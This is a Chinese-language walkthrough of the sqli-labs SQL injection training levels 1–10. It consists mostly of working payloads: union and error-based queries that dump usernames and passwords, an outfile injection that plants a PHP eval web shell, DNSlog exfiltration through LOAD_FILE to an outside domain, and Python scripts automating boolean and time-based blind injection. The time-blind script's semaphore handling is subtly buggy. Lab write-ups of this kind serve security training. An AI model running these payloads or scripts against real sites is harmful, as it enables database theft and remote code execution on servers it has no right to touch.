Less-1(字符型)

?id=1   正常
?id=1' 报错
?id=1' and 1=1--+ 正常
?id=1' and 1=2--+ 报错
判断是字符型注入,闭合方式是'
?id=1'order by 3--+  判断出回显位置3个
?id=-1' union select 1,2,3--+ 判断三个回显位置
?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 爆出数据库名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 字段名
?id=-1' union select 1,2,group_concat(concat_ws('|',username,password)) from users--+ 爆出字段名

Less-2(数字型)

?id=1   正常
?id=1' 报错
?id=1 and 1=1--+ 正常
?id=1 and 1=2--+ 报错
判断是数字型注入
?id=1 order by 3--+  判断出回显位置3个
?id=-1 union select 1,2,3--+ 判断三个回显位置
?id=-1 union select 1,version(),database() --+ 爆出数据库名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 字段名
?id=-1 union select 1,2,group_concat(concat_ws('|',username,password)) from users--+ 爆出字段名

Less-3/4(闭合方式与1/2不同)

Less-3闭合方式为:')

Less-4闭合方式为:")

?id=1   正常
?id=1' 报错
?id=1' and 1=1--+ 报错
?id=1') and 1=1--+ 正常
?id=1') and 1=2--+ 报错
判断是字符型注入,且闭合方式为')
?id=1') order by 3--+ 判断出回显位置3个
?id=-1') union select 1,2,3--+ 判断三个回显位置
?id=-1') union select 1,version(),database() --+ 爆出数据库名
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 字段名
?id=-1') union select 1,2,group_concat(concat_ws('|',username,password)) from users--+ 爆出字段名

Less-5/6(报错注入、盲注)

Less-5为'闭合

Less-6为"闭合

?id=1' 报错''1" LIMIT 0,1',去掉两边单引号后是'闭合
?id=1' and 1=1--+ 正常
?id=1' and 1=2--+ 报错
?id=1' order by 3--+ 无回显
数据正误影响页面显示,可以选择报错注入或者盲注

报错注入:

  • updatexml(xml_document,XPath_string,new_value):第一个参数是XML的内容,第二个参数是需要update的位置(XPATH路径),第三个参数是更新后的内容。所以第一和第三个参数可以随便写,只需要利用第二个参数:它会校验你输入的内容是否符合XPATH格式,不符合就会报错。
?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(database()) from information_schema.schemata)),1)) --+ //数据库名

?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)) --+ //表名

?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)) --+注意:这个需要数据库名和表名

//获取字段
?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(username) from users)),1)) --+
?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(password) from users)),1)) --+
?id=1' and updatexml(1,concat(0x3a,(select concat_ws(':',username,password) from users LIMIT 0,1))--+
  • floor报错
?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(database())))--+ 查数据库

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select table_name from information_schema.tables where table_schema='security' limit 3,1)))--+查表名

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+ 字段名

查看有多少行数据:
?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select count(username) from users)))--+

利用limit一个一个输出:
?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select username from users limit 0,1)))--+
  • extractvalue报错
?id=1' and extractvalue(1,concat(0x23,database(),0x23))--+ 数据库名
?id=1' and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+ 表名
?id=1' and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x23))--+ 字段名
?id=1' and extractvalue(1,concat(0x23,(select username from users limit 0,1),0x23))--+ 获取字段

布尔盲注:

import requests
from multiprocessing import Pool

# Only the url and the two payload templates below need to be changed
# Target address (without query parameters)
url = "http://192.168.235.133:86/less-5/"
# Payload template used to guess the length; {n} is the candidate length
payload_len = "?id=1' and length((select database())) = {n} -- +"
# payload_len = "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database())) = {n} -- +" # table names: n is the length, r is the ASCII value of the character
# payload_len = "?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) = {n} -- +" # column names: n is the length, r is the ASCII value of the character
# payload_len = "?id=1' and length((select group_concat(concat_ws('|',username,password)) from users)) = {n} -- +" # username and password: n is the length, r is the ASCII value of the character

# Payload template used to enumerate characters; {n} is the position, {r} the ASCII value being tested
payload_str = "?id=1' and ascii(substr((select database()),{n},1)) = {r} -- +"
# payload_str = "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{n},1)) = {r} -- +" # table names: n is the length, r is the ASCII value of the character
# payload_str = "?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{n},1)) = {r} -- +" # column names: n is the length, r is the ASCII value of the character
# payload_str = "?id=1' and ascii(substr((select group_concat(concat_ws('|',username,password)) from users),{n},1)) = {r} -- +" # username and password: n is the length, r is the ASCII value of the character
# 获取长度
def getLength(url, payload):
    """Probe increasing length values until the success marker appears in the page.

    Args:
        url: Base address of the target page (no query string).
        payload: Accepted for call compatibility but not used; the request is
            built from the module-level ``payload_len`` template instead.

    Returns:
        The first length for which the response text contains the marker.
        Loops without bound if no length ever matches.
    """
    marker = 'You are in...........'
    candidate = 1
    # Each probe asks whether the length equals `candidate` and inspects the page text.
    while marker not in requests.get(url=url + payload_len.format(n=candidate)).text:
        print('正在测试长度:', candidate)
        candidate += 1
    print('测试长度完成,长度为:', candidate)
    return candidate

# 获取字符
def getChar(args):
    """Test one (position, ASCII code) pair against the target.

    Args:
        args: Tuple ``(url, payload, position, code)``. ``payload`` is ignored;
            the module-level ``payload_str`` template is used instead.

    Returns:
        ``chr(code)`` when the response text contains the success marker,
        otherwise ``None``.
    """
    target, _payload, position, code = args
    page = requests.get(url=target + payload_str.format(n=position, r=code)).text
    return chr(code) if 'You are in...........' in page else None

# 开始猜解
def main():
    """Recover the value selected by the payload templates, one position at a time.

    Returns:
        The recovered string. A position for which no candidate code matched
        contributes nothing to the result.
    """
    length = getLength(url, payload_len)
    print('开始猜解字符.........')
    recovered = ''
    for position in range(1, length + 1):
        workers = Pool(processes=50)  # number of concurrent probes per position
        # One task per ASCII code from 33 up to 125.
        tasks = [(url, payload_str, position, code) for code in range(33, 126)]
        answers = workers.map(getChar, tasks)
        workers.close()
        workers.join()
        matched = next(filter(lambda c: c is not None, answers), None)
        if matched:
            recovered += matched
            print('第', position, '个字符猜解成功:', recovered)
    return recovered

if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()

Less-7(文件操作)

?id=1'  报错
?id=1" 正常
说明闭合方式是'开头
?id=1') 报错
?id=1') and 1=1--+ 报错
?id=1')) 报错
?id=1')) and 1=1--+ 正常
说明'))为正确闭合方式

?id=1')) order by 3--+ 回显位为3
?id=1')) union select 1,2,3--+ 只回显You are in.... Use outfile......,显注不能用,布尔盲注可以使用,但这次使用outfile


Outfile注入:
?id=-1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php" --+
蚁剑连接即可


DNSlog注入:
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.hexlhblwkt.dgrh3.cn\\abc')),2,3--+ 查数据库名
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(group_concat(table_name)) from information_schema.tables where table_schema='security'),'.hexlhblwkt.dgrh3.cn\\abc')),2,3--+ 爆出表名
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(group_concat(column_name)) from information_schema.columns where table_schema='security' and table_name='users'),'.hexlhblwkt.dgrh3.cn\\abc')),2,3--+ 字段名
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password from users limit 3,1),'.coqwyhcrob.dgrh3.cn\\abc')),2,3--+ 爆出字段,只能一个一个爆

Less-8(布尔盲注)

?id=1' 报错
?id=1' and 1=1--+ 正常
?id=1' and 1=2--+ 报错
判断闭合方式为'

可以用DNSlog外带或者写文件
本次使用布尔盲注

布尔盲注脚本:

import requests
from multiprocessing import Pool

# Only the url and the two payload templates below need to be changed
# Target address (without query parameters)
url = "http://192.168.235.133:86/less-8/"
# Payload template used to guess the length; {n} is the candidate length
payload_len = "?id=1' and length((select database())) = {n} -- +"
# payload_len = "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database())) = {n} -- +" # table names: n is the length, r is the ASCII value of the character
# payload_len = "?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) = {n} -- +" # column names: n is the length, r is the ASCII value of the character
# payload_len = "?id=1' and length((select group_concat(concat_ws('|',username,password)) from users)) = {n} -- +" # username and password: n is the length, r is the ASCII value of the character

# Payload template used to enumerate characters; {n} is the position, {r} the ASCII value being tested
payload_str = "?id=1' and ascii(substr((select database()),{n},1)) = {r} -- +"
# payload_str = "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{n},1)) = {r} -- +" # table names: n is the length, r is the ASCII value of the character
# payload_str = "?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{n},1)) = {r} -- +" # column names: n is the length, r is the ASCII value of the character
# payload_str = "?id=1' and ascii(substr((select group_concat(concat_ws('|',username,password)) from users),{n},1)) = {r} -- +" # username and password: n is the length, r is the ASCII value of the character
# 获取长度
def getLength(url, payload):
    """Probe increasing length values until the success marker appears in the page.

    Args:
        url: Base address of the target page (no query string).
        payload: Accepted for call compatibility but not used; the request is
            built from the module-level ``payload_len`` template instead.

    Returns:
        The first length for which the response text contains the marker.
        Loops without bound if no length ever matches.
    """
    marker = 'You are in...........'
    candidate = 1
    # Each probe asks whether the length equals `candidate` and inspects the page text.
    while marker not in requests.get(url=url + payload_len.format(n=candidate)).text:
        print('正在测试长度:', candidate)
        candidate += 1
    print('测试长度完成,长度为:', candidate)
    return candidate

# 获取字符
def getChar(args):
    """Test one (position, ASCII code) pair against the target.

    Args:
        args: Tuple ``(url, payload, position, code)``. ``payload`` is ignored;
            the module-level ``payload_str`` template is used instead.

    Returns:
        ``chr(code)`` when the response text contains the success marker,
        otherwise ``None``.
    """
    target, _payload, position, code = args
    page = requests.get(url=target + payload_str.format(n=position, r=code)).text
    return chr(code) if 'You are in...........' in page else None

# 开始猜解
def main():
    """Recover the value selected by the payload templates, one position at a time.

    Returns:
        The recovered string. A position for which no candidate code matched
        contributes nothing to the result.
    """
    length = getLength(url, payload_len)
    print('开始猜解字符.........')
    recovered = ''
    for position in range(1, length + 1):
        workers = Pool(processes=50)  # number of concurrent probes per position
        # One task per ASCII code from 33 up to 125.
        tasks = [(url, payload_str, position, code) for code in range(33, 126)]
        answers = workers.map(getChar, tasks)
        workers.close()
        workers.join()
        matched = next(filter(lambda c: c is not None, answers), None)
        if matched:
            recovered += matched
            print('第', position, '个字符猜解成功:', recovered)
    return recovered

if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()

Less-9/10(时间盲注)

Less-9 单引号闭合

Less-10 双引号闭合

?id=1' and sleep(3) --+          有明显延迟
?id=1" and sleep(3) --+ 无延迟
?id=1') and sleep(3) --+ 无延迟

说明这里的闭合是单引号。
时间盲注语句:SELECT * FROM users WHERE id=1 AND IF(ASCII(SUBSTR(USER(),1,1))>65 ,SLEEP(5),1);

直接上脚本:

import requests
import threading


url = "http://192.168.235.133:86/Less-9/?id="

# Semaphore bounding how many probe threads run at once
max_threads = 10
thread_semaphore = threading.Semaphore(max_threads)

# Payload template used to enumerate the length; {} is the candidate length
payload_len = "1' and if(length(database())={},sleep(2),1)-- +"
# payload_len = 'admin\' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=\'security\')) = {},sleep(2),1) -- +' # length of the table names
# payload_len = 'admin\" and if(length((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")) = {},sleep(2),1) -- +' # length of the column names
# payload_len = 'admin\' and if(length((select group_concat(username)) from users)) = {},sleep(2),1) -- +' # length of the usernames and passwords

# Payload template used to enumerate characters; {i} is the position, {mid} the ASCII value being tested
payload_str = "1' and if(ascii(substr(database(),{i},1))={mid},sleep(2),1)-- +"
# payload_str = 'admin\' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\'security\'),{i},1)) = {mid},sleep(3),1) -- +' # table names
# payload_str = 'admin\" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),{i},1)) = {mid},sleep(3),1) -- +' # column names
# payload_str = 'admin\' and if(ascii(substr((select group_concat(username)) from users),{i},1)) = {mid},sleep(3),1) -- +' # usernames and passwords


# 获取长度
def get_length(payload_len):
    """Probe increasing length values until a response takes more than 2 seconds.

    Args:
        payload_len: Format template with one positional ``{}`` slot for the
            candidate length; it is appended to the module-level ``url``.

    Returns:
        The first length whose probe response exceeded 2 seconds, or ``None``
        when a request error occurs. Loops without bound if no probe is slow.
    """
    candidate = 1
    while True:
        full_url = url + payload_len.format(candidate)
        try:
            elapsed = requests.get(full_url).elapsed.total_seconds()
        except requests.RequestException as err:
            print("网络请求异常:", err)
            return None
        # A slow response is taken as the signal that `candidate` is the length.
        if elapsed > 2:
            return candidate
        candidate += 1
        print("当前测试长度为:", candidate)

# 获取单个字符
def get_char(i, result):
    """Find the character at position ``i`` and store it in ``result[i-1]``.

    Args:
        i: 1-based position within the value being enumerated.
        result: Shared list; the write is guarded by the module-level
            ``threadLock``, which is created in the ``__main__`` block.

    Returns:
        None. Stops at the first candidate whose response takes more than
        3 seconds, or at the first request error.
    """
    with thread_semaphore:
        for mid in range(32, 127):
            try:
                payload = url + payload_str.format(i=i, mid=mid)
                response = requests.get(payload)
                # A slow response is taken as the signal that `mid` is the right code.
                if response.elapsed.total_seconds() > 3:
                    print(f"第{i}个字符为:", chr(mid))
                    with threadLock:
                        result[i-1] = chr(mid)
                    return
            except requests.RequestException as e:
                print("网络请求异常:", e)
                return
            finally:
                # Released here on every loop iteration, in addition to the
                # release done when the `with thread_semaphore` block exits.
                thread_semaphore.release()

# 主程序
if __name__ == "__main__":
    # Entry point: first determine the length, then fill one position per thread.
    print('开始猜解长度...')
    length = get_length(payload_len)
    if length is None:
        print('无法获取长度。')
    else:
        print('长度为:', length)
        print('开始猜解字符...')
        result = [''] * length
        threadLock = threading.Lock()  # module-level lock used by get_char when writing into result

        workers = []
        for position in range(1, length + 1):
            worker = threading.Thread(target=get_char, args=(position, result))
            workers.append(worker)
            worker.start()

        for worker in workers:
            worker.join()

        result_str = ''.join(result)
        # An empty slot means some position was never resolved.
        if '' in result:
            print('字符获取不完整。')
        else:
            print('猜解字符结果:', result_str)